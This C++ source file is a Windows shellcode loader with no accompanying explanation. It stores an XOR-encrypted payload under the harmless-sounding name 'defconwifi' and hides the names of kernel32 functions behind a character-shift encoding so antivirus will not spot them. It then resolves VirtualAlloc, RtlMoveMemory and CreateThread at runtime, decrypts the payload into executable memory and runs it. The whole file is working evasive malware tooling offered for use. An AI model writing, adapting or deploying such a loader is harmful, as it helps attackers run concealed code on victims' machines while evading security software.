#include <iostream>
#include <windows.h>

typedef LPVOID(WINAPI* VA)(
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD flAllocationType,
    DWORD flProtect
    );

typedef VOID(WINAPI* MVM)(
    VOID UNALIGNED* Destination,
    const VOID UNALIGNED* Source,
    SIZE_T Length
    );

typedef HANDLE(WINAPI* CT)(
    LPSECURITY_ATTRIBUTES lpThreadAttribute,
    SIZE_T dwStackSize,
    LPTHREAD_START_ROUTINE lpStartAddress,
    __drv_aliasesMem LPVOID lpParameter,
    DWORD dwCreationFlag,
    LPDWORD lpThreadID
    );

void cc(char* data, size_t data_len, int offset) {

    int i = 0;

    do {

        data[i] = (int(data[i]) - offset % 255);
        i++;
    } while (i < data_len - 1);
}

void XOR(char* data, size_t data_len, char* key, size_t key_len) {

    int intkey = 0;

    for (int i = 0; i < data_len; i++) {

        if (intkey == key_len - 1) {
            intkey = 0;
        }
        data[i] = data[i] ^ key[intkey];
        intkey++;
    }
}

int main() {

    void* exec;
    HANDLE hThread;
    unsigned int defconwifi_len;

    unsigned char defconwifi[] =
        "\x8b\x63\xcb\x87\x87\xc3\x84\x63\x77\x2b\x09\x32\x36\x7b\x1a"
        "\x2b\x46\xf9\x2d\x2b\xfc\x79\x28\x32\x3f\xa0\x1a\x7b\x21\x63"
        "\xc3\x31\x57\x66\x79\xaa\x3f\xa0\x3a\x33\x3f\x24\xff\x29\x3d"
        "\x63\x79\xa3\xdb\x17\x29\x1f\x75\x07\x68\x22\xb6\xe2\x45\x22"
        "\x76\xea\xaa\x8e\x25\x6a\x19\x2b\xfc\x79\x68\xe8\x35\x17\x00"
        "\x62\xa7\x4d\xc9\x1b\x6f\x20\x4a\x6c\xf2\x59\x48\x63\x77\xa0"
        "\xc8\xeb\x77\x2b\x48\x2b\xf2\xeb\x3c\x04\x3f\x2a\x98\x33\xfc"
        "\x63\x50\x27\xfc\x6b\x68\x2a\x76\xfb\xab\x35\x3a\x1a\x81\x2b"
        "\x88\xe2\x09\xe8\x43\xa3\x00\x62\xa1\x63\x79\xa3\x36\xea\x81"
        "\x6e\xdb\x6a\x49\xa2\x4f\xcb\x3d\x92\x3b\x28\x04\x47\x7f\x6e"
        "\x71\xb2\x02\xf3\x10\x27\xfc\x6b\x6c\x2a\x76\xfb\x2e\x22\xfc"
        "\x27\x00\x27\xfc\x6b\x54\x2a\x76\xfb\x09\xe8\x73\xa3\x09\x3b"
        "\x3f\x2a\x98\x22\x2f\x75\x11\x39\x36\x73\x09\x3a\x36\x71\x00"
        "\xe0\x9b\x0b\x09\x31\x88\xcb\x10\x22\x2e\x71\x00\xe8\x65\xc2"
        "\x03\x9c\x88\xd4\x15\x2b\x46\xf0\x1b\x2a\xc9\x5c\x21\x0d\x1e"
        "\x45\x2d\x17\x77\x6a\x1e\x2b\xfe\xca\x01\xa4\xb5\x67\x3f\x45"
        "\x70\xd4\x9d\x30\x24\x63\xc1\x82\x24\x71\x05\x52\xb7\x66\x79"
        "\xaa\x24\x78\x01\xd9\x4d\x7d\x31\xc4\x77\x2b\x48\x63\x88\xfe"
        "\xa0\x6c\x77\x2b\x48\x52\x4e\x19\x66\x52\x41\x13\x66\x5b\x44"
        "\x05\x79\x51\x4e\x2b\x12\x2b\xfe\xea\x01\xa4\xb7\xd0\x68\x63"
        "\x77\x66\x79\xaa\x24\x78\x22\x60\x24\x62\xf2\x34\xfe\xb4\x8e"
        "\x63\x77\x2b\x48\x9c\xa2\xc3\x75\x63\x77\x2b\x67\x30\x4e\x7e"
        "\x12\x35\x22\x7a\x65\x17\x05\x67\x27\x2d\x12\x40\x7b\x0a\x04"
        "\x1e\x1e\x55\x10\x7b\x1d\x35\x0d\x1a\x7d\x29\x1a\x1a\x31\x27"
        "\x42\x73\x0a\x35\x3a\x18\x7d\x00\x1f\x4d\x26\x29\x4f\x44\x12"
        "\x54\x44\x62\x38\x2e\x00\x44\x05\x2d\x2d\x58\x48\x2b\xfe\xea"
        "\x1b\x39\x36\x73\x05\x52\xbe\x78\x00\xdb\x77\x29\x60\xe7\x77"
        "\x2b\x48\x63\x27\x78\x1b\x2a\xb0\xe9\xa3\x36\x59\x10\xb7\xb6"
        "\x3f\xa2\x8e\x09\x7d\x74\x1b\x39\x3f\xa2\xb9\x2e\x46\xe2\x05"
        "\x52\xbe\x78\x1b\x2a\xb0\xe9\x65\x65\x6f\x50\xb7\xb6\xf2\xeb"
        "\x3d\x7c\x3f\xec\x89\xeb\x64\x2b\x48\x2a\xcd\x6f\xb8\x56\x97"
        "\x2b\x48\x63\x77\xd4\x9d\x2b\x88\xe4\x3c\x61\x9c\xe7\xa0\x36"
        "\x77\x2b\x48\x30\x2e\x41\x08\x39\x3e\xa2\x99\xa2\x95\x3b\x01"
        "\xa4\xb7\x2b\x58\x63\x77\x62\xf2\x3b\xd3\x78\xad\x63\x77\x2b"
        "\x48\x9c\xa2\x63\xdb\x30\x24\x63\xc1\x84\x3f\xa2\xb9\x2b\xfe"
        "\xf1\x01\xa4\xb7\x2b\x68\x63\x77\x62\xc1\x9a\x3e\x91\x5a\xf5"
        "\xfe\xc9\x48\x63\x77\x2b\xb7\xb6\x3f\xa8\x8c\x43\xf2\xeb\x3c"
        "\xd1\x11\xa0\x4f\x2b\x76\xe8\xcd\xa3\x02\xf9\x10\xa0\x2f\x41"
        "\x48\x3a\x3e\xec\x8a\x93\xc2\x89\x1e\x9c\xa2";
    defconwifi_len = sizeof(defconwifi);

    
    char key[] = "w+Hc";
    char eva[] = "\x1b\x2e\x37\x39\x3a\x26\x31\x06\x31\x31\x34\x28";
    char emvm[] = "\x17\x39\x31\x12\x34\x3b\x2a\x12\x2a\x32\x34\x37\x3e";
    char ect[] = "\x08\x37\x2a\x26\x39\x2a\x19\x2d\x37\x2a\x26\x29";
    char ekl32[] = "\x30\x2a\x37\x33\x2a\x31\xf8\xf7";

    cc((char*)ekl32, sizeof(ekl32), 197);
    cc((char*)eva, sizeof(eva), 197);
    VA vainit = (VA)GetProcAddress(GetModuleHandleA(ekl32), eva);
    exec = vainit(0, defconwifi_len, MEM_COMMIT | MEM_RESERVE, 0x40);

    cc((char*)emvm, sizeof(emvm), 197);
    MVM mvminit = (MVM)GetProcAddress(GetModuleHandleA(ekl32), emvm);
    mvminit(exec, defconwifi, defconwifi_len);

    XOR((char*)exec, defconwifi_len, key, sizeof(key));

    cc((char*)ect, sizeof(ect), 197);
    CT ctinit = (CT)GetProcAddress(GetModuleHandleA(ekl32), ect);
    hThread = ctinit(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);

    WaitForSingleObject(hThread, -1);
}


